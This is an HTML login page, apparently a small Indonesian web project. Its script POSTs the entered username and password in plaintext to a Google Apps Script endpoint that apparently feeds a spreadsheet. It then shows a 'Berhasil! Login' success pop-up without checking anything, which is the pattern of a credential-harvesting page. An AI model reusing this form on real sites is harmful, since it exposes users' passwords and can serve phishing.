<html>
  <head>
    <title></title>
  </head>
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous" />
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <style>
    @import url(https://fonts.googleapis.com/css?family=Exo:100,200,400);
    @import url(https://fonts.googleapis.com/css?family=Source+Sans+Pro:700,400,300);

    body {
      margin: 0;
      padding: 0;
      background: #fff;

      color: #fff;
      font-family: Arial;
      font-size: 12px;
    }

    .body {
      position: absolute;
      top: -20px;
      left: -20px;
      right: -40px;
      bottom: -40px;
      width: auto;
      height: auto;
      background-image: url(https://images.unsplash.com/photo-1539376248633-cf94fa8b7bd8?ixlib=rb-4.0.3&ixid=MnwxMjA3fDB8MHxzZWFyY2h8NDR8fGxhcHRvcHxlbnwwfHwwfHw%3D&auto=format&fit=crop&w=500&q=60);
      background-size: cover;
      -webkit-filter: blur(5px);
      z-index: 0;
    }

    .grad {
      position: absolute;
      top: -20px;
      left: -20px;
      right: -40px;
      bottom: -40px;
      width: auto;
      height: auto;
      background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, rgba(0, 0, 0, 0)), color-stop(100%, rgba(0, 0, 0, 0.65))); /* Chrome,Safari4+ */
      z-index: 1;
      opacity: 0.7;
    }

    .header {
      position: absolute;
      top: calc(50% - 35px);
      left: calc(50% - 255px);
      z-index: 2;
    }

    .header div {
      float: left;
      color: #fff;
      font-family: "Exo", sans-serif;
      font-size: 35px;
      font-weight: 200;
    }

    .header div span {
      color: #5379fa !important;
    }

    .login {
      position: absolute;
      top: calc(50% - 75px);
      left: calc(50% - 50px);
      height: 150px;
      width: 350px;
      padding: 10px;
      z-index: 2;
    }

    .login input[type="text"] {
      width: 250px;
      height: 30px;
      background: transparent;
      border: 1px solid rgba(255, 255, 255, 0.6);
      border-radius: 2px;
      color: #fff;
      font-family: "Exo", sans-serif;
      font-size: 16px;
      font-weight: 400;
      padding: 4px;
    }

    .login input[type="password"] {
      width: 250px;
      height: 30px;
      background: transparent;
      border: 1px solid rgba(255, 255, 255, 0.6);
      border-radius: 2px;
      color: #fff;
      font-family: "Exo", sans-serif;
      font-size: 16px;
      font-weight: 400;
      padding: 4px;
      margin-top: 10px;
    }

    .login input[type="button"] {
      width: 260px;
      height: 35px;
      background: #fff;
      border: 1px solid #fff;
      cursor: pointer;
      border-radius: 2px;
      color: #a18d6c;
      font-family: "Exo", sans-serif;
      font-size: 16px;
      font-weight: 400;
      padding: 6px;
      margin-top: 10px;
    }

    .login input[type="button"]:hover {
      opacity: 0.8;
    }

    .login input[type="button"]:active {
      opacity: 0.6;
    }

    .login input[type="text"]:focus {
      outline: none;
      border: 1px solid rgba(255, 255, 255, 0.9);
    }

    .login input[type="password"]:focus {
      outline: none;
      border: 1px solid rgba(255, 255, 255, 0.9);
    }

    .login input[type="button"]:focus {
      outline: none;
    }
    .login a[type="button"]:focus {
      outline: none;
    }
    ::-webkit-input-placeholder {
      color: rgba(255, 255, 255, 0.6);
    }

    ::-moz-input-placeholder {
      color: rgba(255, 255, 255, 0.6);
    }
    .login input[type="submit"] {
      width: 260px;
      height: 35px;
      background: #fff;
      border: 1px solid #fff;
      cursor: pointer;
      border-radius: 2px;
      color: #a18d6c;
      font-family: "Exo", sans-serif;
      font-size: 16px;
      font-weight: 400;
      padding: 6px;
      margin-top: 10px;
    }
    .login a[type="submit"] {
      width: 260px;
      height: 35px;
      background: #fff;
      border: 1px solid #fff;
      cursor: pointer;
      border-radius: 2px;
      color: #a18d6c;
      font-family: "Exo", sans-serif;
      font-size: 16px;
      font-weight: 400;
      padding: 6px;
      margin-top: 10px;
      text-decoration: none;
    }
    .login input[type="submit"]:hover {
      opacity: 0.8;
    }

    .login input[type="submit"]:active {
      opacity: 0.6;
    }
    .login a[type="submit"]:hover {
      opacity: 0.8;
    }

    .login a[type="submit"]:active {
      opacity: 0.6;
    }
    .w3-panel {
      background-color: green;
      opacity: 0.6;
    }
    img {
      position: fixed;
      width: auto;
      height: auto;
      right: -100px;
      bottom: -45px;
      left: -200px;
      top: -225px;
    }
  </style>
  <body>
    <form name="submit-to-google-sheet">
      <div class="body"></div>
      <div class="grad"></div>
      <div class="header">
        <div class="logo" style="transform: scale(0.666667); left: 45%; top: 10%">
          <img alt="Logo" src="img/Logo Login.png" />
        </div>
      </div>
      <br />
      <div class="login">
        <input type="text" placeholder="Username" name="username" /><br />
        <input type="password" placeholder="Password" name="password" /><br />
        <input class="btn btn-primary bg-primary text-white" type="submit" onclick="contoh()" value="Login" />
        <a class="bg-primary text-white" type="submit" href="https://muhammadryhan03.github.io/Beranda.github.io/" align="center">Beranda</a>
      </div>
    </form>
  </body>
  <script>
    const scriptURL = "https://script.google.com/macros/s/AKfycbxMOphIDgEfMgH6dRXDzpqoFVuJW39p5b68yY1GBxAUIC0aI0Sn1_ZT-Q5BOv96l9Sg/exec";
    const form = document.forms["submit-to-google-sheet"];

    form.addEventListener("submit", (e) => {
      e.preventDefault();
      fetch(scriptURL, { method: "POST", body: new FormData(form) })
        .then((response) => console.log("Success!", response))
        .catch((error) => console.error("Error!", error.message));
    });
  </script>
  <script type="text/javascript">
    function contoh() {
      swal({
        title: "Berhasil!",
        text: "Login",
        icon: "success",
        button: true,
      });
    }
  </script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
</html>
